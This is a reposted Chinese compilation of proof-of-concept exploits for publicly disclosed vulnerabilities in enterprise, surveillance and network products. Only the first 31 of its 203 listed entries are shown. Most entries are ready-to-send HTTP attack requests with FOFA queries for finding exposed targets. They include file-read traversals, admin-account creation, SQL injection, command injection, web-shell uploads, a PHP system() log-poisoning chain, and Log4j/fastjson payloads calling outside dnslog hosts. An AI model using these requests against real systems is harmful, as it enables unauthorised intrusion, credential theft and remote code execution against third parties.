
Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. We hope this article helps defenders; defensive teams can use its contents for risk assessment.

Vulnerability sources: this article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long have been replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legitimate rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.


Statement

To simplify things and make browsing easier, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC smart IoT integrated management platform arbitrary file read
21. Dahua ICC smart IoT integrated management platform random remote code execution
22. Dahua ICC smart IoT integrated management platform log4j remote code execution
23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <=20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload


PoC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x


The payload is the following statement, URL-encoded twice:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the file is uploaded, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request, which executes the function and applies base64 encoding:
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the test target to execute the id command; the request header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice (医微云) SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC smart IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC smart IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC smart IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
